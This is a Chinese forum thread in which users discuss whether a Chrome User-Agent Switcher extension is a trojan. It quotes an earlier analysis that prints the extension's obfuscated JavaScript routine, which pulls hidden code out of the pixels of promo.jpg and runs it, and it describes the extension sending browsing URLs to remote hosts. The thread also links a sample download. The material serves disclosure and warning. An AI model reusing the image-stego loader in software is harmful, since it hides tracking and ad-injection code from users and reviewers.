怀疑Chrome 的插件 User-Agent Switcher 是个木马
本帖最后由 记忆孩子 于 2019-11-17 23:24 编辑个人在网上下载User-Agent Switcher插件时发现了可能带有木马的帖子
抱着论坛里大部分人都在使用的插件可能带有木马的心情,上传到病毒救援区。请大佬看看。
以下内容搬运https://www.v2ex.com/t/389340?p=1为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里background.js 的第 80 行,从这个图片里解密出恶意代码并执行t.prototype.Vh = function(t, e) { if ("" === '../promo.jpg') return ""; void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {}; var n = this.ET, i = e.mp || n.mp, o = e.Tv || n.Tv, h = e.At || n.At, a = r.Yb(Math.pow(2, i)), f = (e.WC || n.WC, e.TY || n.TY), u = document.createElement("canvas"), p = u.getContext("2d"); if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return ""; e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0); var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = []; if (c.data.every(function(t) { return 0 === t })) return ""; var m, s; if (1 === o) for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d - (255 - a + 1)); var v = "", w = 0, y = 0, l = Math.pow(2, h) - 1; for (m = 0; m < g.length; m += 1) w += g << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g >> i - y); return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v) }会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
链接: https://pan.baidu.com/s/1cUv4lfqeSpWe7yYgRuWdpw 提取码: 1cd5解压码:52pojie
19楼的大佬已经给出了解释,大家放心用。是我没有看清楚原贴的内容,感谢大佬的分析。我对不起大家,浪费了大家的时间,我给大家磕头了 。
好了 大家散了吧
本帖最后由 骑着蚂蚁兜风 于 2019-11-17 21:51 编辑
仔细看帖子 人家所说的那个插件不是你发的这个
你要明白,你发的这个插件是谷歌官方发布的,大兄弟。。。
人家说的有问题的,只是名字很类似的一个user-agent-switcher-for-g
而官方版是user-agent-switcher-for-c,就是User-Agent Switcher for Chrome
没问题的user-agent-switcher-for-c
有问题的user-agent-switcher-for-g 不是一个插件,这个插件已经从谷歌商店移除了
https://mp.weixin.qq.com/s?__biz=MzU5MjEzOTM3NA==&mid=2247483944&idx=1&sn=5308fc37b2e1669474a8e0c89f469b41&chksm=fe250729c9528e3fc7a12f2809a64b19df67814c956c66ea5a5010dec76ff000a83e9395dddb&mpshare=1&scene=1&srcid=0910IGmGqBNi6ckoSY4U5Jl5#rd
这是当时的分析报告
编辑解释一下吧,别误导其他人了 Truama 发表于 2019-11-17 20:48
是那个pandownload网页版解析要用到的插件吗?!个人之前也在用。
是的 就是那个插件 之前有网友发现有木马 但是也不知道有没有解决 我就想上传上来让大佬们看一眼现在还有吗 卧槽,你居然跟我想到一块去了,我发现这个插件有毒,B站直播都看不了,我后来把浏览器插件一个个试才找到原因的发现是这货在搞鬼,而且还弹广告,然后把他禁用了 啥玩意,那个帖子2017年的,现在还没解决吗 2017-09-09 06:27:10 +08:00
................. 是那个pandownload网页版解析要用到的插件吗?!个人之前也在用。 zxcnny930 发表于 2019-11-17 20:48
2017-09-09 06:27:10 +08:00
.................
安全起见请大佬凑一眼嘛这个插件用的人挺多的如果是我多想了 那也是最好的 哈哈 重大发现,支持一下 emmm关注一下 我也在用这个插件 这个有好几个版本 名字都差不多